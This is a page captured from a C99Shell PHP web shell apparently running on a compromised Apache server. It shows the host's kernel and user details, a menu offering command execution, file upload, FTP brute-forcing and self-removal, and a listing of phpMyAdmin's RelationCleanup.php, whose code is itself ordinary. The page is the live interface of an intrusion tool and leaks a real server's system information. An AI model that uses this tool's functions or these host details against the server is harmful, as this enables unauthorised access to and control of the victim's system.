!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/phpmyadmin/libraries/classes/   drwxr-xr-x
Free 13.05 GB of 57.97 GB (22.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RelationCleanup.php (14.7 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Set of functions used for cleaning up phpMyAdmin tables
 *
 * @package PhpMyAdmin
 */
namespace PhpMyAdmin;

use 
PhpMyAdmin\Relation;
use 
PhpMyAdmin\Util;

/**
 * PhpMyAdmin\RelationCleanup class
 *
 * @package PhpMyAdmin
 */
class RelationCleanup
{
    
/**
     * Cleanup column related relation stuff
     *
     * @param string $db     database name
     * @param string $table  table name
     * @param string $column column name
     *
     * @return void
     */
    
public static function column($db$table$column)
    {
        
$relation = new Relation();
        
$cfgRelation $relation->getRelationsParam();

        if (
$cfgRelation['commwork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['column_info'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\''
                
' AND table_name = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\''
                
' AND column_name = \'' $GLOBALS['dbi']->escapeString($column)
                . 
'\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['displaywork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['table_info'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\''
                
' AND table_name = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\''
                
' AND display_field = \'' $GLOBALS['dbi']->escapeString($column)
                . 
'\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['relwork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['relation'])
                . 
' WHERE master_db  = \'' $GLOBALS['dbi']->escapeString($db)
                . 
'\''
                
' AND master_table = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\''
                
' AND master_field = \'' $GLOBALS['dbi']->escapeString($column)
                . 
'\'';
            
$relation->queryAsControlUser($remove_query);

            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['relation'])
                . 
' WHERE foreign_db  = \'' $GLOBALS['dbi']->escapeString($db)
                . 
'\''
                
' AND foreign_table = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\''
                
' AND foreign_field = \'' $GLOBALS['dbi']->escapeString($column)
                . 
'\'';
            
$relation->queryAsControlUser($remove_query);
        }
    }

    
/**
     * Cleanup table related relation stuff
     *
     * @param string $db    database name
     * @param string $table table name
     *
     * @return void
     */
    
public static function table($db$table)
    {
        
$relation = new Relation();
        
$cfgRelation $relation->getRelationsParam();

        if (
$cfgRelation['commwork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['column_info'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\''
                
' AND table_name = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['displaywork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['table_info'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\''
                
' AND table_name = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['pdfwork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['table_coords'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\''
                
' AND table_name = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['relwork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['relation'])
                . 
' WHERE master_db  = \'' $GLOBALS['dbi']->escapeString($db)
                . 
'\''
                
' AND master_table = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\'';
            
$relation->queryAsControlUser($remove_query);

            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['relation'])
                . 
' WHERE foreign_db  = \'' $GLOBALS['dbi']->escapeString($db)
                . 
'\''
                
' AND foreign_table = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['uiprefswork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['table_uiprefs'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\''
                
' AND table_name = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['navwork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['navigationhiding'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\''
                
' AND (table_name = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\''
                
' OR (item_name = \'' $GLOBALS['dbi']->escapeString($table)
                . 
'\''
                
' AND item_type = \'table\'))';
            
$relation->queryAsControlUser($remove_query);
        }
    }

    
/**
     * Cleanup database related relation stuff
     *
     * @param string $db database name
     *
     * @return void
     */
    
public static function database($db)
    {
        
$relation = new Relation();
        
$cfgRelation $relation->getRelationsParam();

        if (
$cfgRelation['commwork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['column_info'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['bookmarkwork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['bookmark'])
                . 
' WHERE dbase  = \'' $GLOBALS['dbi']->escapeString($db) . '\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['displaywork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['table_info'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['pdfwork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['pdf_pages'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\'';
            
$relation->queryAsControlUser($remove_query);

            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['table_coords'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['relwork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['relation'])
                . 
' WHERE master_db  = \''
                
$GLOBALS['dbi']->escapeString($db) . '\'';
            
$relation->queryAsControlUser($remove_query);

            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['relation'])
                . 
' WHERE foreign_db  = \'' $GLOBALS['dbi']->escapeString($db)
                . 
'\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['uiprefswork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['table_uiprefs'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['navwork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['navigationhiding'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['savedsearcheswork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['savedsearches'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\'';
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['centralcolumnswork']) {
            
$remove_query 'DELETE FROM '
                
Util::backquote($cfgRelation['db'])
                . 
'.' Util::backquote($cfgRelation['central_columns'])
                . 
' WHERE db_name  = \'' $GLOBALS['dbi']->escapeString($db) . '\'';
            
$relation->queryAsControlUser($remove_query);
        }
    }

    
/**
     * Cleanup user related relation stuff
     *
     * @param string $username username
     *
     * @return void
     */
    
public static function user($username)
    {
        
$relation = new Relation();
        
$cfgRelation $relation->getRelationsParam();

        if (
$cfgRelation['bookmarkwork']) {
            
$remove_query "DELETE FROM "
                
Util::backquote($cfgRelation['db'])
                . 
"." Util::backquote($cfgRelation['bookmark'])
                . 
" WHERE `user`  = '" $GLOBALS['dbi']->escapeString($username)
                . 
"'";
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['historywork']) {
            
$remove_query "DELETE FROM "
                
Util::backquote($cfgRelation['db'])
                . 
"." Util::backquote($cfgRelation['history'])
                . 
" WHERE `username`  = '" $GLOBALS['dbi']->escapeString($username)
                . 
"'";
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['recentwork']) {
            
$remove_query "DELETE FROM "
                
Util::backquote($cfgRelation['db'])
                . 
"." Util::backquote($cfgRelation['recent'])
                . 
" WHERE `username`  = '" $GLOBALS['dbi']->escapeString($username)
                . 
"'";
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['favoritework']) {
            
$remove_query "DELETE FROM "
                
Util::backquote($cfgRelation['db'])
                . 
"." Util::backquote($cfgRelation['favorite'])
                . 
" WHERE `username`  = '" $GLOBALS['dbi']->escapeString($username)
                . 
"'";
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['uiprefswork']) {
            
$remove_query "DELETE FROM "
                
Util::backquote($cfgRelation['db'])
                . 
"." Util::backquote($cfgRelation['table_uiprefs'])
                . 
" WHERE `username`  = '" $GLOBALS['dbi']->escapeString($username)
                . 
"'";
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['userconfigwork']) {
            
$remove_query "DELETE FROM "
                
Util::backquote($cfgRelation['db'])
                . 
"." Util::backquote($cfgRelation['userconfig'])
                . 
" WHERE `username`  = '" $GLOBALS['dbi']->escapeString($username)
                . 
"'";
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['menuswork']) {
            
$remove_query "DELETE FROM "
                
Util::backquote($cfgRelation['db'])
                . 
"." Util::backquote($cfgRelation['users'])
                . 
" WHERE `username`  = '" $GLOBALS['dbi']->escapeString($username)
                . 
"'";
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['navwork']) {
            
$remove_query "DELETE FROM "
                
Util::backquote($cfgRelation['db'])
                . 
"." Util::backquote($cfgRelation['navigationhiding'])
                . 
" WHERE `username`  = '" $GLOBALS['dbi']->escapeString($username)
                . 
"'";
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['savedsearcheswork']) {
            
$remove_query "DELETE FROM "
                
Util::backquote($cfgRelation['db'])
                . 
"." Util::backquote($cfgRelation['savedsearches'])
                . 
" WHERE `username`  = '" $GLOBALS['dbi']->escapeString($username)
                . 
"'";
            
$relation->queryAsControlUser($remove_query);
        }

        if (
$cfgRelation['designersettingswork']) {
            
$remove_query "DELETE FROM "
                
Util::backquote($cfgRelation['db'])
                . 
"." Util::backquote($cfgRelation['designer_settings'])
                . 
" WHERE `username`  = '" $GLOBALS['dbi']->escapeString($username)
                . 
"'";
            
$relation->queryAsControlUser($remove_query);
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0324 ]--